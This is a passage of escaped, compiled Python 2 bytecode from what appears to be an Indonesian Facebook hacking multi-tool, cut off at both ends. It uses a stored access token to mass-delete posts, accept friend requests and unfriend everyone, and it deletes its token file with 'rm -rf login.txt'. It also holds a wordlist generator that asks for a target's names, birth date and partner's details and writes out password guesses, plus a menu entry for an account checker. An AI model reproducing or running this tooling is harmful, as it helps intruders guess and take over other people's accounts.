e\x00\x01\x01\x01d\x06\x00GHt\x00\x00j\x01\x00d\x07\x00\x83\x01\x00\x01t\n\x00j\x0b\x00d\x08\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\r\x00GHd\t\x00|\x03\x00\x16GHt\x0e\x00d\n\x00\x83\x01\x00\x01d\x0b\x00d\x0c\x00\x14GHt\x04\x00j\x05\x00d\r\x00|\x00\x00\x17\x83\x01\x00}\x04\x00t\x06\x00j\x07\x00|\x04\x00j\x08\x00\x83\x01\x00}\x05\x00x\xed\x00|\x05\x00d\x0e\x00\x19D]\xe1\x00}\x06\x00|\x06\x00d\x0f\x00\x19}\x07\x00d\x10\x00}\x08\x00t\x04\x00j\x05\x00d\x11\x00|\x07\x00\x17d\x12\x00\x17|\x00\x00\x17\x83\x01\x00}\t\x00t\x06\x00j\x07\x00|\t\x00j\x08\x00\x83\x01\x00}\n\x00y3\x00|\n\x00d\x13\x00\x19d\x14\x00\x19}\x0b\x00d\x15\x00|\x07\x00d\x16\x00 j\x0f\x00d\x17\x00d\x18\x00\x83\x02\x00\x17d\x19\x00\x17d\x1a\x00\x17GHWq\xed\x00\x04t\x10\x00k\n\x00r\xa1\x01\x01\x01\x01d\x1b\x00|\x07\x00d\x16\x00 j\x0f\x00d\x17\x00d\x18\x00\x83\x02\x00\x17d\x19\x00\x17d\x1c\x00\x17GH|\x08\x00d\x08\x007}\x08\x00q\xed\x00\x04t\x04\x00j\x11\x00j\x12\x00k\n\x00r\xcd\x01\x01\x01\x01d\x1d\x00GHt\x13\x00d\x1e\x00\x83\x01\x00\x01t\x14\x00\x83\x00\x00\x01q\xed\x00Xq\xed\x00Wd\x0b\x00d\x0c\x00\x14GHd\x1f\x00GHt\x13\x00d\x1e\x00\x83\x01\x00\x01t\x14\x00\x83\x00\x00\x01d\x00\x00S( \x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s+\x00\x00\x00https://graph.facebook.com/me?access_token=R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s)\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%ss"\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mStart\x1b[1;97m ...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s0\x00\x00\x00https://graph.facebook.com/me/feed?access_token=Rl\x00\x00\x00Rj\x00\x00\x00i\x00\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x1c\x00\x00\x00?method=delete&access_token=t\x05\x00\x00\x00errort\x07\x00\x00\x00messages\x0f\x00\x00\x00\x1b[1;91m[\x1b[1;97mi\n\x00\x00\x00s\x01\x00\x00\x00\nR%\x01\x00\x00s\x03\x00\x00\x00...s\x16\x00\x00\x00\x1b[1;91m] \x1b[1;95mFaileds\x0f\x00\x00\x00\x1b[1;92m[\x1b[1;97ms\x17\x00\x00\x00\x1b[1;92m] \x1b[1;96mDeleteds\x1b\x00\x00\x00\x1b[1;91m[!] Connection Errors\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x16\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mDone(\x15\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R \x00\x00\x00R\x16\x00\x00\x00t\t\x00\x00\x00TypeErrorRi\x00\x00\x00R\x01\x00\x00\x00R/\x00\x00\x00R\x11\x01\x00\x00(\x0c\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00namt\x03\x00\x00\x00lolRq\x00\x00\x00t\x03\x00\x00\x00asut\x04\x00\x00\x00asusR\xf1\x00\x00\x00Rj\x00\x00\x00t\x04\x00\x00\x00piroRk\x00\x00\x00t\x02\x00\x00\x00okR2\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x16\x01\x00\x00L\x08\x00\x00sJ\x00\x00\x00\x00\x01\r\x01\x03\x01\x15\x01\x13\x01\x12\x01\x0e\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\t\x01\n\x01\t\x01\x13\x01\x12\x01\x11\x01\n\x01\x06\x01\x1b\x01\x12\x01\x03\x01\x0e\x01%\x01\r\x01!\x01\r\x01\x13\x01\x05\x01\n\x01\x0f\x01\t\x01\x05\x01\n\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x91\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00}\x01\x00t\n\x00j\x0b\x00d\x08\x00|\x01\x00\x17d\t\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0c\x00j\r\x00|\x02\x00j\x0e\x00\x83\x01\x00}\x03\x00d\n\x00t\x0f\x00|\x03\x00d\x0b\x00\x19\x83\x01\x00k\x06\x00r\xda\x00d\x0c\x00GHt\t\x00d\r\x00\x83\x01\x00\x01t\x10\x00\x83\x00\x00\x01n\x00\x00t\x11\x00d\x0e\x00\x83\x01\x00\x01d\x0f\x00d\x10\x00\x14GHx~\x00|\x03\x00d\x0b\x00\x19D]r\x00}\x04\x00t\n\x00j\x12\x00d\x11\x00|\x04\x00d\x12\x00\x19d\x13\x00\x19\x17d\x14\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\x0c\x00j\r\x00|\x05\x00j\x0e\x00\x83\x01\x00}\x06\x00d\x15\x00t\x0f\x00|\x06\x00\x83\x01\x00k\x06\x00rY\x01d\x16\x00|\x04\x00d\x12\x00\x19d\x17\x00\x19\x17GHq\xf8\x00d\x18\x00|\x04\x00d\x12\x00\x19d\x17\x00\x19\x17GHq\xf8\x00Wd\x0f\x00d\x10\x00\x14GHd\x19\x00GHt\t\x00d\r\x00\x83\x01\x00\x01t\x10\x00\x83\x00\x00\x01d\x00\x00S(\x1a\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s(\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m s3\x00\x00\x00https://graph.facebook.com/me/friendrequests?limit=s\x0e\x00\x00\x00&access_token=s\x02\x00\x00\x00[]Rl\x00\x00\x00s\x1c\x00\x00\x00\x1b[1;91m[!] No friend requests\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s&\x00\x00\x00https://graph.facebook.com/me/friends/t\x04\x00\x00\x00fromRj\x00\x00\x00s\x0e\x00\x00\x00?access_token=R2\x01\x00\x00s \x00\x00\x00\x1b[1;97m[ \x1b[1;91mFailed\x1b[1;97m ] R0\x00\x00\x00s \x00\x00\x00\x1b[1;97m[ \x1b[1;92mAccept\x1b[1;97m ] s\x16\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mDone(\x13\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R\x17\x00\x00\x00R\x11\x01\x00\x00R \x00\x00\x00Rh\x00\x00\x00(\x07\x00\x00\x00R4\x00\x00\x00R(\x01\x00\x00R\'\x00\x00\x00R\x07\x01\x00\x00R\x13\x00\x00\x00t\x03\x00\x00\x00gasRm\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x17\x01\x00\x00t\x08\x00\x00s:\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x1b\x01\x12\x01\x16\x01\x05\x01\n\x01\n\x01\n\x01\t\x01\x11\x01#\x01\x12\x01\x12\x01\x14\x02\x15\x01\t\x01\x05\x01\n\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00sR\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00\x01d\x08\x00GHd\t\x00d\n\x00\x14GHyt\x00t\n\x00j\x0b\x00d\x0b\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\x0c\x00j\r\x00|\x01\x00j\x0e\x00\x83\x01\x00}\x02\x00xH\x00|\x02\x00d\x0c\x00\x19D]<\x00}\x03\x00|\x03\x00d\r\x00\x19}\x04\x00|\x03\x00d\x0e\x00\x19}\x05\x00t\n\x00j\x0f\x00d\x0f\x00|\x05\x00\x17d\x10\x00\x17|\x00\x00\x17\x83\x01\x00\x01d\x11\x00|\x04\x00\x17GHq\xbd\x00WWn7\x00\x04t\x10\x00k\n\x00r\x11\x01\x01\x01\x01n\'\x00\x04t\x11\x00k\n\x00r7\x01\x01\x01\x01d\x12\x00GHt\x12\x00d\x13\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x01\x00Xd\x14\x00GHt\x12\x00d\x13\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01d\x00\x00S(\x15\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...s\x19\x00\x00\x00\x1b[1;97mStop \x1b[1;91mCTRL+Ci*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=Rl\x00\x00\x00R0\x00\x00\x00Rj\x00\x00\x00s*\x00\x00\x00https://graph.facebook.com/me/friends?uid=s\x0e\x00\x00\x00&access_token=s!\x00\x00\x00\x1b[1;97m[\x1b[1;92m Deleted \x1b[1;97m] s\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x17\x00\x00\x00\n\x1b[1;91m[+] \x1b[1;92mDone(\x14\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x06\x00\x00\x00deletet\n\x00\x00\x00IndexErrorR\x96\x00\x00\x00R/\x00\x00\x00R\x11\x01\x00\x00(\x06\x00\x00\x00R4\x00\x00\x00R\x0e\x01\x00\x00R}\x00\x00\x00R\x13\x00\x00\x00Rq\x00\x00\x00Rj\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x18\x01\x00\x00\x95\x08\x00\x00s<\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\n\x01\x05\x01\t\x01\x03\x01\x13\x01\x12\x01\x11\x01\n\x01\n\x01\x19\x01\x11\x01\r\x00\x03\x01\r\x01\x05\x01\n\x01\x0b\x01\x05\x01\n\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa0\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x0e\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s1\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Create Posts5\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Create Wordlists5\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3.\x1b[1;97m Account Checkers7\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4.\x1b[1;97m See my group lists3\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5.\x1b[1;97m Profile Guards*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\n\x00\x00\x00pilih_lain(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x04\x00\x00\x00lain\xb7\x08\x00\x00s$\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xbb\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\x90\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01nz\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x03\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x06\x00k\x02\x00ri\x00t\x04\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x07\x00k\x02\x00r\x7f\x00t\x05\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x08\x00k\x02\x00r\x95\x00t\x06\x00\x83\x00\x00\x01n"\x00|\x00\x00d\t\x00k\x02\x00r\xab\x00t\x07\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\n\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00R9\x00\x00\x00Rs\x00\x00\x00Rt\x00\x00\x00R\x81\x00\x00\x00R:\x00\x00\x00(\x08\x00\x00\x00R/\x00\x00\x00R?\x01\x00\x00t\x06\x00\x00\x00statusR\xfb\x00\x00\x00t\n\x00\x00\x00check_akunt\x08\x00\x00\x00grupsayat\x05\x00\x00\x00guardR+\x00\x00\x00(\x01\x00\x00\x00t\x05\x00\x00\x00other(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R?\x01\x00\x00\xcb\x08\x00\x00s$\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x05\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00}\x01\x00|\x01\x00d\x08\x00k\x02\x00r\xa3\x00d\t\x00GHt\t\x00d\n\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01n^\x00t\x0b\x00j\x0c\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\r\x00j\x0e\x00|\x02\x00j\x0f\x00\x83\x01\x00}\x03\x00t\x10\x00d\r\x00\x83\x01\x00\x01d\x0e\x00d\x0f\x00\x14GHd\x10\x00|\x03\x00d\x11\x00\x19\x17GHt\t\x00d\n\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x00\x00S(\x12\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s.\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mType status \x1b[1;91m:\x1b[1;97m R\n\x00\x00\x00s\x19\x00\x00\x00\x1b[1;91m[!] Don\'t be emptys\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s7\x00\x00\x00https://graph.facebook.com/me/feed?method=POST&message=s\x0e\x00\x00\x00&access_token=s%\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mCreate \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97mRj\x00\x00\x00(\x11\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R@\x01\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R \x00\x00\x00(\x04\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00msgt\x03\x00\x00\x00resR\x9e\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>RA\x01\x00\x00\xe1\x08\x00\x00s,\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x0c\x01\x05\x01\n\x01\n\x02\x1b\x01\x12\x01\n\x01\t\x01\r\x01\n\x01c\x00\x00\x00\x00\x14\x00\x00\x00\xd0\x00\x00\x00C\x00\x00\x00s4\x05\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\xa4\x04t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00d\t\x00\x14GHt\t\x00d\n\x00\x83\x01\x00}\x01\x00t\x02\x00|\x01\x00d\x0b\x00\x17d\x0c\x00\x83\x02\x00}\x02\x00t\t\x00d\r\x00\x83\x01\x00}\x03\x00t\t\x00d\x0e\x00\x83\x01\x00}\x04\x00t\t\x00d\x0f\x00\x83\x01\x00}\x05\x00t\t\x00d\x10\x00\x83\x01\x00}\x06\x00|\x06\x00d\x11\x00d\x12\x00!}\x07\x00|\x06\x00d\x12\x00d\x13\x00!}\x08\x00|\x06\x00d\x13\x00\x1f}\t\x00d\x08\x00d\t\x00\x14GHd\x14\x00GHt\t\x00d\x15\x00\x83\x01\x00}\n\x00t\t\x00d\x16\x00\x83\x01\x00}\x0b\x00t\t\x00d\x17\x00\x83\x01\x00}\x0c\x00t\n\x00d\x18\x00\x83\x01\x00\x01|\x0c\x00d\x11\x00d\x12\x00!}\r\x00|\x0c\x00d\x12\x00d\x13\x00!}\x0e\x00|\x0c\x00d\x13\x00\x1f}\x0f\x00|\x02\x00j\x0b\x00d\x19\x00|\x01\x00|\x04\x00|\x01\x00|\x03\x00|\x03\x00|\x01\x00|\x03\x00|\x04\x00|\x04\x00|\x01\x00|\x04\x00|\x03\x00|\x01\x00|\x01\x00|\x03\x00|\x03\x00|\x04\x00|\x04\x00|\x01\x00|\x05\x00|\x03\x00|\x05\x00|\x04\x00|\x05\x00|\x05\x00|\x05\x00|\x05\x00|\x01\x00|\x05\x00|\x03\x00|\x05\x00|\x04\x00|\x01\x00|\x06\x00|\x01\x00|\x07\x00|\x01\x00|\x08\x00|\x01\x00|\t\x00|\x03\x00|\x06\x00|\x03\x00|\x07\x00|\x03\x00|\x08\x00|\x03\x00|\t\x00|\x04\x00|\x06\x00|\x04\x00|\x07\x00|\x04\x00|\x08\x00|\x04\x00|\t\x00|\x05\x00|\x06\x00|\x05\x00|\x07\x00|\x05\x00|\x08\x00|\x05\x00|\t\x00|\x06\x00|\x01\x00|\x07\x00|\x01\x00|\x08\x00|\x01\x00|\t\x00|\x01\x00|\x06\x00|\x03\x00|\x07\x00|\x03\x00|\x08\x00|\x03\x00|\t\x00|\x03\x00|\x06\x00|\x04\x00|\x07\x00|\x04\x00|\x08\x00|\x04\x00|\t\x00|\x04\x00|\x06\x00|\x05\x00|\x07\x00|\x05\x00|\x08\x00|\x05\x00|\t\x00|\x05\x00|\x05\x00|\x05\x00|\x01\x00|\x07\x00|\x08\x00|\x01\x00|\x08\x00|\t\x00|\x07\x00|\x08\x00|\x07\x00|\t\x00|\x07\x00|\x07\x00|\x08\x00|\x07\x00|\x08\x00|\t\x00|\x08\x00|\x08\x00|\t\x00|\x07\x00|\t\x00|\x08\x00|\t\x00|\t\x00|\t\x00|\x08\x00|\x07\x00|\x01\x00|\x08\x00|\t\x00|\x03\x00|\x07\x00|\x08\x00|\x03\x00|\x08\x00|\t\x00|\x04\x00|\x07\x00|\x08\x00|\x04\x00|\x08\x00|\t\x00|\x05\x00|\x07\x00|\x08\x00|\x05\x00|\x08\x00|\t\x00|\x01\x00|\n\x00|\x01\x00|\x0b\x00|\x01\x00|\x0c\x00|\n\x00|\x06\x00|\n\x00|\x0b\x00|\n\x00|\x0c\x00|\x03\x00|\n\x00|\x03\x00|\x0b\x00|\x03\x00|\x0c\x00|\x04\x00|\n\x00|\x04\x00|\x0b\x00|\x04\x00|\x0c\x00|\x06\x00|\x0c\x00|\x0b\x00|\x01\x00|\x0b\x00|\x03\x00|\x0b\x00|\x04\x00|\x0b\x00|\x05\x00|\x0b\x00|\x0b\x00|\x0c\x00|\x01\x00|\x0c\x00|\x03\x00|\x0c\x00|\x04\x00|\x0c\x00|\x05\x00|\x0c\x00|\x0c\x00|\n\x00|\r\x00|\n\x00|\x0e\x00|\n\x00|\x0f\x00|\x0b\x00|\r\x00|\x0b\x00|\x0e\x00|\x0b\x00|\x0f\x00|\x0b\x00|\x0c\x00f\xce\x00\x16\x83\x01\x00\x01d\x11\x00}\x10\x00x5\x00|\x10\x00d\x1a\x00k\x00\x00r\x0e\x04|\x10\x00d\x06\x00\x17}\x10\x00|\x02\x00j\x0b\x00|\x01\x00t\x0c\x00|\x10\x00\x83\x01\x00\x17d\x1b\x00\x17\x83\x01\x00\x01q\xda\x03Wd\x11\x00}\x11\x00x5\x00|\x11\x00d\x1a\x00k\x00\x00rL\x04|\x11\x00d\x06\x00\x17}\x11\x00|\x02\x00j\x0b\x00|\n\x00t\x0c\x00|\x11\x00\x83\x01\x00\x17d\x1b\x00\x17\x83\x01\x00\x01q\x18\x04Wd\x11\x00}\x12\x00x5\x00|\x12\x00d\x1a\x00k\x00\x00r\x8a\x04|\x12\x00d\x06\x00\x17}\x12\x00|\x02\x00j\x0b\x00|\x05\x00t\x0c\x00|\x12\x00\x83\x01\x00\x17d\x1b\x00\x17\x83\x01\x00\x01qV\x04Wd\x11\x00}\x13\x00x5\x00|\x13\x00d\x1a\x00k\x00\x00r\xc8\x04|\x13\x00d\x06\x00\x17}\x13\x00|\x02\x00j\x0b\x00|\x0b\x00t\x0c\x00|\x13\x00\x83\x01\x00\x17d\x1b\x00\x17\x83\x01\x00\x01q\x94\x04W|\x02\x00j\r\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1c\x00\x83\x01\x00\x01d\x08\x00d\t\x00\x14GHd\x1d\x00|\x01\x00\x16GHt\t\x00d\x1e\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01Wn)\x00\x04t\x04\x00k\n\x00r/\x05\x01}\x06\x00\x01d\x1f\x00GHt\t\x00d\x1e\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S( \x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s?\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mFill in the complete data of the target belowi*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s&\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: s\x04\x00\x00\x00.txtR\x11\x00\x00\x00s\'\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: s)\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: s*\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: s>\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: i\x00\x00\x00\x00i\x02\x00\x00\x00i\x04\x00\x00\x00s)\x00\x00\x00\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :vs&\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: s0\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: sD\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: s%\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mCreate 